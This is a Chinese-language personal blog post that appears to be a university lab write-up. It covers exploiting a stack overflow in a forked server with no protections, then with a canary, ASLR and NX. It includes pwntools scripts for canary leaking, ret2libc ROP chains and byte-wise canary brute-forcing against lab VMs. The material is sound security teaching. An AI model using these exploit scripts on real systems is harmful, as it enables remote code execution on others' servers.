<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="实验4+实验环境：由于在自己电脑上运行docker始终存在非常奇怪的且长时间未能解决的bug，所以决定更换实验环境，采用两个虚拟机，分别作为客户端和服务端。虽然更换了试验环境，但实验的核心内容和原理并没有改变，只是在一些细节上与原环境存在一点点差异。服务端环境:Ubuntu22.04;libc version:2.35。客户端环境:Linux kali 5.14.0;libc version:2.">
<meta property="og:type" content="article">
<meta property="og:title" content="测试测试">
<meta property="og:url" content="http://example.com/2024/01/16/%E6%B5%8B%E8%AF%95%E6%B5%8B%E8%AF%95/index.html">
<meta property="og:site_name" content="yuiiiii">
<meta property="og:description" content="实验4+实验环境：由于在自己电脑上运行docker始终存在非常奇怪的且长时间未能解决的bug，所以决定更换实验环境，采用两个虚拟机，分别作为客户端和服务端。虽然更换了试验环境，但实验的核心内容和原理并没有改变，只是在一些细节上与原环境存在一点点差异。服务端环境:Ubuntu22.04;libc version:2.35。客户端环境:Linux kali 5.14.0;libc version:2.">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-01-16T06:38:45.000Z">
<meta property="article:modified_time" content="2024-01-16T06:39:35.596Z">
<meta property="article:author" content="hsf">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2024/01/16/%E6%B5%8B%E8%AF%95%E6%B5%8B%E8%AF%95/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>测试测试 | yuiiiii</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">yuiiiii</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/01/16/%E6%B5%8B%E8%AF%95%E6%B5%8B%E8%AF%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="hsf">
      <meta itemprop="description" content="yui的个人博客，测试">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="yuiiiii">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          测试测试
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2024-01-16 14:38:45 / 修改时间：14:39:35" itemprop="dateCreated datePublished" datetime="2024-01-16T14:38:45+08:00">2024-01-16</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="实验4"><a href="#实验4" class="headerlink" title="实验4+"></a><center>实验4+</h2><h3 id="实验环境："><a href="#实验环境：" class="headerlink" title="实验环境："></a>实验环境：</h3><p>由于在自己电脑上运行docker始终存在非常奇怪的且长时间未能解决的bug，所以决定更换实验环境，采用两个虚拟机，分别作为客户端和服务端。虽然更换了试验环境，但实验的核心内容和原理并没有改变，只是在一些细节上与原环境存在一点点差异。<br>服务端环境:Ubuntu22.04;libc version:2.35。<br>客户端环境:Linux kali 5.14.0;libc version:2.36。</p>
<h4 id="一-无任何安全防护"><a href="#一-无任何安全防护" class="headerlink" title="一.无任何安全防护"></a>一.无任何安全防护</h4><p>（1）使用GDB在server端communicate函数下断点，并跟踪子进程（将follow-fork-mode设置为child）。从client端发送任意数据，再在server端打印得到buf地址。<br><image src='15.png'><br>（2）查看communicate函数汇编：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">400847:	55                   	push   %rbp</span><br><span class="line">400848:	48 89 e5             	mov    %rsp,%rbp</span><br><span class="line">40084b:	48 83 ec 40          	sub    $0x40,%rsp</span><br><span class="line">char buf[MAX_BUF_SIZE];</span><br><span class="line"></span><br><span class="line">recv(client_socket, buf, MAX_MSG_LEN, 0);    </span><br><span class="line">40084f:	8b 05 5b 08 20 00    	mov    0x20085b(%rip),%eax        # 6010b0 &lt;client_socket&gt;</span><br><span class="line">400855:	48 8d 75 c0          	lea    -0x40(%rbp),%rsi</span><br><span class="line">400859:	b9 00 00 00 00       	mov    $0x0,%ecx</span><br><span class="line">40085e:	ba 00 04 00 00       	mov    $0x400,%edx</span><br><span class="line">400863:	89 c7                	mov    %eax,%edi</span><br><span class="line">400865:	e8 26 fe ff ff       	callq  400690 &lt;recv@plt&gt;</span><br></pre></td></tr></table></figure>
<p>易知buf_size应为0x40,payload&#x3D;buf_size*’A’+rbp+ret_addr+shellcode。所以shellcode地址在buf_addr+0x50处。<br>将上述数据填入client.py并运行，成功拿到shell。<br><image src='16.png'></p>
<h4 id="二-开启栈保护-Canary"><a href="#二-开启栈保护-Canary" class="headerlink" title="二.开启栈保护(Canary)"></a>二.开启栈保护(Canary)</h4><p>（1）同样使用第一关中的方法得到buf地址：<br><image src='17.png'><br>（2）查看汇编：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">4008b7:	55                   	push   %rbp</span><br><span class="line">  4008b8:	48 89 e5             	mov    %rsp,%rbp</span><br><span class="line">  4008bb:	48 83 ec 50          	sub    $0x50,%rsp</span><br><span class="line">  4008bf:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax</span><br><span class="line">  4008c6:	00 00 </span><br><span class="line">  4008c8:	48 89 45 f8          	mov    %rax,-0x8(%rbp)</span><br><span class="line">  4008cc:	31 c0                	xor    %eax,%eax</span><br><span class="line">  char buf[MAX_BUF_SIZE];</span><br><span class="line"></span><br><span class="line">  recv(client_socket, buf, MAX_MSG_LEN, 0);    </span><br><span class="line">  4008ce:	8b 05 ec 07 20 00    	mov    0x2007ec(%rip),%eax        # 6010c0 &lt;client_socket&gt;</span><br><span class="line">  4008d4:	48 8d 75 b0          	lea    -0x50(%rbp),%rsi</span><br></pre></td></tr></table></figure>
<p>可知canary在rbp-0x8处，buf在rbp-0x50处。所以payload&#x3D;0x48*’A’+canary+rbp+ret_addr+shellcode。<br>shellcode地址为buf_addr+0x60。<br>（3）获取canary：<br>可以通过communicate中的send函数获取canary，将canary前的内容覆盖为非\x00的值，即可拿到canary。由于64位下canary最低位为\x00，所以需要覆盖0x48+1个字节。payload&#x3D;0x49*’A’。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">buf_size = 0x49</span><br><span class="line">buf_data = b&quot;A&quot; * buf_size</span><br><span class="line">payload = buf_data</span><br><span class="line">r = pwn.remote(&quot;192.168.78.130&quot;, 1988)</span><br><span class="line">r.send(payload)</span><br><span class="line">r.recvuntil(payload)</span><br><span class="line">canary = pwn.u64(b&quot;\x00&quot; + r.recv(7))</span><br><span class="line">print(&quot;canary:&quot; ,hex(canary))</span><br><span class="line">r.close()</span><br></pre></td></tr></table></figure>
<p>（4）发送（2）中分析得到的payload即可拿到shell。<br><image src='18.png'></p>
<h4 id="三-开启栈保护-Canary-地址随机化-ASLR"><a href="#三-开启栈保护-Canary-地址随机化-ASLR" class="headerlink" title="三.开启栈保护(Canary)+ 地址随机化(ASLR)"></a>三.开启栈保护(Canary)+ 地址随机化(ASLR)</h4><p>（1）打印栈上buf附近的内容：<br><image src='19.png'><br>可以发现old_rbp&#x3D;buf_addr-0x60。所以可以通过获取old_rbp地址间接得到buf_addr。<br>（2）与第二关获取canary的代码大致相同，只不过这一次还需要获取old_rbp。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">buf_size = 0x49</span><br><span class="line">    buf_data = b&quot;A&quot; * buf_size</span><br><span class="line">    payload = buf_data</span><br><span class="line">    r = pwn.remote(&quot;192.168.132.128&quot;, 1988)</span><br><span class="line">    r.send(payload)</span><br><span class="line">    r.recvuntil(payload)</span><br><span class="line">    canary = pwn.u64(b&quot;\x00&quot; + r.recv(7))</span><br><span class="line">    print(&quot;canary: %x\n&quot; % canary)</span><br><span class="line">    canary = pwn.p64(canary)</span><br><span class="line">    saved_rbp = pwn.u64(r.recv(6) + b&quot;\x00\x00&quot;)</span><br><span class="line">    print(&quot;saved_rbp: %x\n&quot; % saved_rbp)</span><br><span class="line">    buf_addr = saved_rbp - 0x60</span><br><span class="line">    r.close()</span><br></pre></td></tr></table></figure>
<p>（3）后续攻击过程同第二关，略。<br><image src='19.png'></p>
<h4 id="四-开启栈保护-Canary-地址随机化-ASLR-栈不可执行-NonExec"><a href="#四-开启栈保护-Canary-地址随机化-ASLR-栈不可执行-NonExec" class="headerlink" title="四.开启栈保护(Canary)+ 地址随机化(ASLR) + 栈不可执行(NonExec)"></a>四.开启栈保护(Canary)+ 地址随机化(ASLR) + 栈不可执行(NonExec)</h4><p>由于栈不可执行，那么不能使用在栈上注入shellcode的方法。<br>（1）首先同样是获取canary，脚本同第二关，略。<br>（2）通过libc_start_main的地址获取libc中system和binsh字符串地址。由于更换了实验环境，libc版本也有变化，所以选择使用工具LibcSearcher帮助计算system函数和bin_sh字符串的地址。<br>首先在main函数下断点，运行停止后查看main函数的返回地址，发现并非libc_start_main的地址，而是__libc_start_call_main函数中，与__libc_start_main地址低0x30，所以接收到的地址还要再加0x30才得到__libc_start_main的地址。然后利用libcsearcher即可找到system和binsh的地址了。<br><image src='21.png'></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">buf_size = 0x68</span><br><span class="line">buf_data = b&quot;A&quot; * buf_size</span><br><span class="line">payload = buf_data</span><br><span class="line">r = pwn.remote(ip, 1988)</span><br><span class="line">r.send(payload)</span><br><span class="line">r.recvuntil(payload)</span><br><span class="line">ret_addr_libc = pwn.u64(r.recv(6) + b&quot;\x00\x00&quot;)</span><br><span class="line">ret_addr_libc+=0x30</span><br><span class="line">print(hex(ret_addr_libc))</span><br><span class="line">libc=LibcSearcher(&#x27;__libc_start_main&#x27;,ret_addr_libc)</span><br><span class="line">base=ret_addr_libc-libc.dump(&#x27;__libc_start_main&#x27;)</span><br><span class="line">sys=base+libc.dump(&#x27;system&#x27;)</span><br><span class="line">bin_sh=base+libc.dump(&#x27;str_bin_sh&#x27;)</span><br><span class="line">print(&quot;ret_addr_libc: %x\n&quot; % ret_addr_libc)</span><br><span class="line">print(&quot;binsh_str_addr: %x\n&quot; % bin_sh)</span><br><span class="line">print(&quot;system_addr: %x\n&quot; % sys)</span><br></pre></td></tr></table></figure>
<p>（3）构造<code>payload=buf_data+canary+old_rbp+single_ret+pop_rdi+bin_sh_addr+system_addr</code>。<br>其中buf_data+canary+old_rbp无需多言，single_ret是为了栈对齐，64位下system函数需要16字节对齐。pop_rdi_ret是传参，因为64位下函数第一个参数通过rdi寄存器传递。<br>single_ret和pop_rdi_ret的地址通过ropper工具查找得到。<br><image src='23.png'><br><image src='24.png'><br>运行脚本成功拿到shell。<br><image src='22.png'></p>
<h4 id="五-实验二中，将communicate函数中的send注释掉。"><a href="#五-实验二中，将communicate函数中的send注释掉。" class="headerlink" title="五.实验二中，将communicate函数中的send注释掉。"></a>五.实验二中，将communicate函数中的send注释掉。</h4><p>实现原理:fork得到的字进程canary和父进程相同，所以可以反复连接server端，让其创建子进程，进而逐位爆破canary。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">buf_size = 0x48</span><br><span class="line">buf_data = b&quot;A&quot; * buf_size</span><br><span class="line">canary=b&#x27;\x00&#x27; #canary第一位一定是\x00</span><br><span class="line">for i in range(7): #爆破canary后七位</span><br><span class="line">    for j in range(256):</span><br><span class="line">        payload=buf_data+canary+j.to_bytes(1,&#x27;little&#x27;)</span><br><span class="line">        r = pwn.remote(&quot;192.168.253.128&quot;,1988)</span><br><span class="line">        r.send(payload)</span><br><span class="line">        try:</span><br><span class="line">            a=r.recv()</span><br><span class="line">            #如果有接收到父进程的success，说明canary正确。</span><br><span class="line">            if b&#x27;Success&#x27; in a:</span><br><span class="line">                print(a)</span><br><span class="line">                canary+=j.to_bytes(1,&#x27;little&#x27;)</span><br><span class="line">                r.close()</span><br><span class="line">                break</span><br><span class="line">        except EOFError:</span><br><span class="line">            r.close()</span><br><span class="line">            pass</span><br><span class="line">        r.close()</span><br></pre></td></tr></table></figure>
<p>运行拿到shell。<br><image src='25.png'></p>
<h4 id="六-思考题"><a href="#六-思考题" class="headerlink" title="六.思考题"></a>六.思考题</h4><p>（1）实验1中，如何获得buf的固定地址？<br>已在第一关中说明。<br>（2）实验2中，获得canary值的步骤为何需要填充0x49个字节，而不是0x48个字节？<br>因为64位下canary最低位是\x00，如果不将它覆盖掉，那么send函数就会在此截断，无法获取canary。<br>（3）实验3中，获得saved_rbp值的步骤在什么情况下会失败？<br>原理同上，如果saved_rbp有一个字节是\x00的话就会失败。<br>（4）实验4中，为何在pop_rdi_gadget之前需要有ret_gadget？如果去掉ret_gadget会发生什么？<br>原因已在第四关说明，如果去掉canary将会导致system调用失败。<br>（5）实验4中，能否不用no-pie编译选项？<br>pie是一种生成地址无关可执行程序的技术如果开启了pie那么，可执行程序的地址将变得随机，pop_rdi_ret和single_ret地址都将不可确定，因此实验无法成功。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/01/16/test/" rel="prev" title="">
      <i class="fa fa-chevron-left"></i> 
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C4"><span class="nav-number">1.</span> <span class="nav-text">实验4+</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83%EF%BC%9A"><span class="nav-number">1.1.</span> <span class="nav-text">实验环境：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80-%E6%97%A0%E4%BB%BB%E4%BD%95%E5%AE%89%E5%85%A8%E9%98%B2%E6%8A%A4"><span class="nav-number">1.1.1.</span> <span class="nav-text">一.无任何安全防护</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BA%8C-%E5%BC%80%E5%90%AF%E6%A0%88%E4%BF%9D%E6%8A%A4-Canary"><span class="nav-number">1.1.2.</span> <span class="nav-text">二.开启栈保护(Canary)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%89-%E5%BC%80%E5%90%AF%E6%A0%88%E4%BF%9D%E6%8A%A4-Canary-%E5%9C%B0%E5%9D%80%E9%9A%8F%E6%9C%BA%E5%8C%96-ASLR"><span class="nav-number">1.1.3.</span> <span class="nav-text">三.开启栈保护(Canary)+ 地址随机化(ASLR)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9B%9B-%E5%BC%80%E5%90%AF%E6%A0%88%E4%BF%9D%E6%8A%A4-Canary-%E5%9C%B0%E5%9D%80%E9%9A%8F%E6%9C%BA%E5%8C%96-ASLR-%E6%A0%88%E4%B8%8D%E5%8F%AF%E6%89%A7%E8%A1%8C-NonExec"><span class="nav-number">1.1.4.</span> <span class="nav-text">四.开启栈保护(Canary)+ 地址随机化(ASLR) + 栈不可执行(NonExec)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BA%94-%E5%AE%9E%E9%AA%8C%E4%BA%8C%E4%B8%AD%EF%BC%8C%E5%B0%86communicate%E5%87%BD%E6%95%B0%E4%B8%AD%E7%9A%84send%E6%B3%A8%E9%87%8A%E6%8E%89%E3%80%82"><span class="nav-number">1.1.5.</span> <span class="nav-text">五.实验二中，将communicate函数中的send注释掉。</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%AD-%E6%80%9D%E8%80%83%E9%A2%98"><span class="nav-number">1.1.6.</span> <span class="nav-text">六.思考题</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">hsf</p>
  <div class="site-description" itemprop="description">yui的个人博客，测试</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/nameisyui" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;nameisyui" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">hsf</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
